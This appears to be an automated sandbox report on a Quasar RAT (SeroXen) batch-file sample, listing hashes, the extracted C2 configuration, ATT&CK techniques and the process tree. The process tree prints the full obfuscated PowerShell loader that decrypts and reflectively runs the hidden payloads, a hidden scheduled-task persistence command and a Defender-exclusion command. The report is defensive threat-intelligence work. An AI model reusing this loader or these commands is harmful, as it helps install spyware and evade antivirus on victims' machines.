quasar | a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

General

Target

rename me.bat
Size

514KB
MD5

414264bb47935bed191128cf44f3a2cd
SHA1

df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256

a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512

c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
SSDEEP

12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

147.185.221.19:33587

Mutex

$Sxr-2rfrZTKITtK0P0zGYG

Attributes

encryption_key
Yr0YpBPNd3kXsl43jZMx
install_name
$sxr-sdinwn.exe
log_directory
$sxr
reconnect_delay
3000
startup_key
$sxr-metsha
subdirectory
sxr

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/536-75-0x0000000006D70000-0x0000000006DDE000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 536 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe

flow	pid	process
17	536	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

$sxr-sdinwn.exe

pid process

3628 $sxr-sdinwn.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3992 schtasks.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

1592 ipconfig.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe

pid	process
3628	$sxr-sdinwn.exe

flow	ioc
16	ip-api.com

pid	process
3992	schtasks.exe

pid	process
1592	ipconfig.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exe

pid	process
2720	powershell.exe
2720	powershell.exe
3340	powershell.exe
3340	powershell.exe
536	powershell.exe
536	powershell.exe
3628	$sxr-sdinwn.exe
4904	powershell.exe
4904	powershell.exe
3628	$sxr-sdinwn.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeIncreaseQuotaPrivilege	3340	powershell.exe
Token: SeSecurityPrivilege	3340	powershell.exe
Token: SeTakeOwnershipPrivilege	3340	powershell.exe
Token: SeLoadDriverPrivilege	3340	powershell.exe
Token: SeSystemProfilePrivilege	3340	powershell.exe
Token: SeSystemtimePrivilege	3340	powershell.exe
Token: SeProfSingleProcessPrivilege	3340	powershell.exe
Token: SeIncBasePriorityPrivilege	3340	powershell.exe
Token: SeCreatePagefilePrivilege	3340	powershell.exe
Token: SeBackupPrivilege	3340	powershell.exe
Token: SeRestorePrivilege	3340	powershell.exe
Token: SeShutdownPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeSystemEnvironmentPrivilege	3340	powershell.exe
Token: SeRemoteShutdownPrivilege	3340	powershell.exe
Token: SeUndockPrivilege	3340	powershell.exe
Token: SeManageVolumePrivilege	3340	powershell.exe
Token: 33	3340	powershell.exe
Token: 34	3340	powershell.exe
Token: 35	3340	powershell.exe
Token: 36	3340	powershell.exe
Token: SeIncreaseQuotaPrivilege	3340	powershell.exe
Token: SeSecurityPrivilege	3340	powershell.exe
Token: SeTakeOwnershipPrivilege	3340	powershell.exe
Token: SeLoadDriverPrivilege	3340	powershell.exe
Token: SeSystemProfilePrivilege	3340	powershell.exe
Token: SeSystemtimePrivilege	3340	powershell.exe
Token: SeProfSingleProcessPrivilege	3340	powershell.exe
Token: SeIncBasePriorityPrivilege	3340	powershell.exe
Token: SeCreatePagefilePrivilege	3340	powershell.exe
Token: SeBackupPrivilege	3340	powershell.exe
Token: SeRestorePrivilege	3340	powershell.exe
Token: SeShutdownPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeSystemEnvironmentPrivilege	3340	powershell.exe
Token: SeRemoteShutdownPrivilege	3340	powershell.exe
Token: SeUndockPrivilege	3340	powershell.exe
Token: SeManageVolumePrivilege	3340	powershell.exe
Token: 33	3340	powershell.exe
Token: 34	3340	powershell.exe
Token: 35	3340	powershell.exe
Token: 36	3340	powershell.exe
Token: SeIncreaseQuotaPrivilege	3340	powershell.exe
Token: SeSecurityPrivilege	3340	powershell.exe
Token: SeTakeOwnershipPrivilege	3340	powershell.exe
Token: SeLoadDriverPrivilege	3340	powershell.exe
Token: SeSystemProfilePrivilege	3340	powershell.exe
Token: SeSystemtimePrivilege	3340	powershell.exe
Token: SeProfSingleProcessPrivilege	3340	powershell.exe
Token: SeIncBasePriorityPrivilege	3340	powershell.exe
Token: SeCreatePagefilePrivilege	3340	powershell.exe
Token: SeBackupPrivilege	3340	powershell.exe
Token: SeRestorePrivilege	3340	powershell.exe
Token: SeShutdownPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeSystemEnvironmentPrivilege	3340	powershell.exe
Token: SeRemoteShutdownPrivilege	3340	powershell.exe
Token: SeUndockPrivilege	3340	powershell.exe
Token: SeManageVolumePrivilege	3340	powershell.exe
Token: 33	3340	powershell.exe
Token: 34	3340	powershell.exe
Token: 35	3340	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4048 wrote to memory of 2720	4048	cmd.exe	powershell.exe
PID 4048 wrote to memory of 2720	4048	cmd.exe	powershell.exe
PID 4048 wrote to memory of 2720	4048	cmd.exe	powershell.exe
PID 2720 wrote to memory of 3340	2720	powershell.exe	powershell.exe
PID 2720 wrote to memory of 3340	2720	powershell.exe	powershell.exe
PID 2720 wrote to memory of 3340	2720	powershell.exe	powershell.exe
PID 2720 wrote to memory of 3144	2720	powershell.exe	WScript.exe
PID 2720 wrote to memory of 3144	2720	powershell.exe	WScript.exe
PID 2720 wrote to memory of 3144	2720	powershell.exe	WScript.exe
PID 3144 wrote to memory of 4256	3144	WScript.exe	cmd.exe
PID 3144 wrote to memory of 4256	3144	WScript.exe	cmd.exe
PID 3144 wrote to memory of 4256	3144	WScript.exe	cmd.exe
PID 4256 wrote to memory of 536	4256	cmd.exe	powershell.exe
PID 4256 wrote to memory of 536	4256	cmd.exe	powershell.exe
PID 4256 wrote to memory of 536	4256	cmd.exe	powershell.exe
PID 536 wrote to memory of 3992	536	powershell.exe	schtasks.exe
PID 536 wrote to memory of 3992	536	powershell.exe	schtasks.exe
PID 536 wrote to memory of 3992	536	powershell.exe	schtasks.exe
PID 536 wrote to memory of 3628	536	powershell.exe	$sxr-sdinwn.exe
PID 536 wrote to memory of 3628	536	powershell.exe	$sxr-sdinwn.exe
PID 536 wrote to memory of 3628	536	powershell.exe	$sxr-sdinwn.exe
PID 536 wrote to memory of 4904	536	powershell.exe	powershell.exe
PID 536 wrote to memory of 4904	536	powershell.exe	powershell.exe
PID 536 wrote to memory of 4904	536	powershell.exe	powershell.exe
PID 536 wrote to memory of 1592	536	powershell.exe	ipconfig.exe
PID 536 wrote to memory of 1592	536	powershell.exe	ipconfig.exe
PID 536 wrote to memory of 1592	536	powershell.exe	ipconfig.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_812_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_812.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_812.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_812.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_812.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_812.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:3992

C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4904

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
6⤵
- Gathers network information
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Command and Scripting Interpreter

1

T1059

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d17dfffbcebe48829998fc6db28bd398

SHA1
627fb873a2f7dc52de40a88da1f83f58844307c5

SHA256
a81bd9823c9e310a24b6169cd34a4bfaaaf74f47824761cbda187ec4b3aa4c7c

SHA512
981e70b6beb2086da6688d12024c8b80bfe323e1a15ddae8b5c4f33dc19a9fb6d4d9ec9b24eb1424275d264168a83cdf3c5d43106ea5ba72528723e4c731eadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
fbb527ccccbdba136a804d49f98dd18e

SHA1
8a5b5c498dbac54b39337c0b6494afae805fd80d

SHA256
68a515f431f8c22e8e95cbdbfe287d87bb203e1b5c7ade3f46e573dfc776bca4

SHA512
64d5aa7b9b684654a2d0e15727e9bc2dd51f669bd0f1df22964721bc7c59ae486928d52222056d8d584f6ff8b4db9da15dbd9886984b0adfff8fda1f23e7a3f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5mvra5n.tgx.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_812.bat
Filesize
514KB

MD5
414264bb47935bed191128cf44f3a2cd

SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130

SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_812.vbs
Filesize
115B

MD5
da50c767899e89be2747b807d950b672

SHA1
d7495afae53905b5c680f23340ad8f9a8101cda9

SHA256
27e32b40ca044aee97ae9fa954bba97d3d81d27dead54917426d72826e7af476

SHA512
b5d7133fc8216a8a0de9d370f49255df75c0f62b276775791d57d6473e521aaa3ed88280a52078ee8aeaa31727d677166fa1dcfd3ac8062775f613061d0badaf

Download Submit
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/536-79-0x0000000007240000-0x000000000727C000-memory.dmp

Filesize
240KB

Download
memory/536-78-0x0000000006F90000-0x0000000006FA2000-memory.dmp

Filesize
72KB

Download
memory/536-76-0x0000000006E80000-0x0000000006F12000-memory.dmp

Filesize
584KB

Download
memory/536-75-0x0000000006D70000-0x0000000006DDE000-memory.dmp

Filesize
440KB

Download
memory/2720-20-0x00000000070C0000-0x00000000070DA000-memory.dmp

Filesize
104KB

Download
memory/2720-19-0x0000000007710000-0x0000000007D8A000-memory.dmp

Filesize
6.5MB

Download
memory/2720-21-0x00000000028D0000-0x00000000028D8000-memory.dmp

Filesize
32KB

Download
memory/2720-22-0x0000000007150000-0x00000000071B2000-memory.dmp

Filesize
392KB

Download
memory/2720-23-0x0000000009340000-0x00000000098E4000-memory.dmp

Filesize
5.6MB

Download
memory/2720-1-0x0000000004C10000-0x0000000004C20000-memory.dmp

Filesize
64KB

Download
memory/2720-2-0x0000000002A60000-0x0000000002A96000-memory.dmp

Filesize
216KB

Download
memory/2720-3-0x0000000005250000-0x0000000005878000-memory.dmp

Filesize
6.2MB

Download
memory/2720-4-0x00000000051B0000-0x00000000051D2000-memory.dmp

Filesize
136KB

Download
memory/2720-77-0x0000000075090000-0x0000000075840000-memory.dmp

Filesize
7.7MB

Download
memory/2720-0-0x0000000075090000-0x0000000075840000-memory.dmp

Filesize
7.7MB

Download
memory/2720-6-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/2720-5-0x00000000059B0000-0x0000000005A16000-memory.dmp

Filesize
408KB

Download
memory/2720-16-0x0000000005A90000-0x0000000005DE4000-memory.dmp

Filesize
3.3MB

Download
memory/2720-17-0x0000000005F60000-0x0000000005F7E000-memory.dmp

Filesize
120KB

Download
memory/2720-18-0x0000000005F80000-0x0000000005FCC000-memory.dmp

Filesize
304KB

Download
memory/3340-48-0x0000000007710000-0x000000000772E000-memory.dmp

Filesize
120KB

Download
memory/3340-44-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/3340-53-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/3340-52-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

Filesize
68KB

Download
memory/3340-51-0x0000000007B50000-0x0000000007BE6000-memory.dmp

Filesize
600KB

Download
memory/3340-50-0x0000000007930000-0x000000000793A000-memory.dmp

Filesize
40KB

Download
memory/3340-49-0x0000000007790000-0x0000000007833000-memory.dmp

Filesize
652KB

Download
memory/3340-25-0x0000000075090000-0x0000000075840000-memory.dmp

Filesize
7.7MB

Download
memory/3340-37-0x0000000070EB0000-0x0000000070EFC000-memory.dmp

Filesize
304KB

Download
memory/3340-36-0x0000000007750000-0x0000000007782000-memory.dmp

Filesize
200KB

Download
memory/3340-26-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/3340-56-0x0000000075090000-0x0000000075840000-memory.dmp

Filesize
7.7MB

Download
memory/3628-105-0x0000000007040000-0x0000000007084000-memory.dmp

Filesize
272KB

Download
memory/3628-117-0x0000000007420000-0x0000000007496000-memory.dmp

Filesize
472KB

Download
memory/4904-104-0x0000000006D20000-0x0000000006D42000-memory.dmp

Filesize
136KB

Download
memory/4904-116-0x00000000071D0000-0x0000000007273000-memory.dmp

Filesize
652KB

Download
memory/4904-118-0x00000000073B0000-0x00000000073C1000-memory.dmp

Filesize
68KB

Download
memory/4904-119-0x00000000073E0000-0x00000000073EE000-memory.dmp

Filesize
56KB

Download
memory/4904-120-0x00000000073F0000-0x0000000007404000-memory.dmp

Filesize
80KB

Download
memory/4904-121-0x0000000007B20000-0x0000000007B3A000-memory.dmp

Filesize
104KB

Download
memory/4904-122-0x0000000007B10000-0x0000000007B18000-memory.dmp

Filesize
32KB

Download
memory/4904-106-0x0000000070EB0000-0x0000000070EFC000-memory.dmp

Filesize
304KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads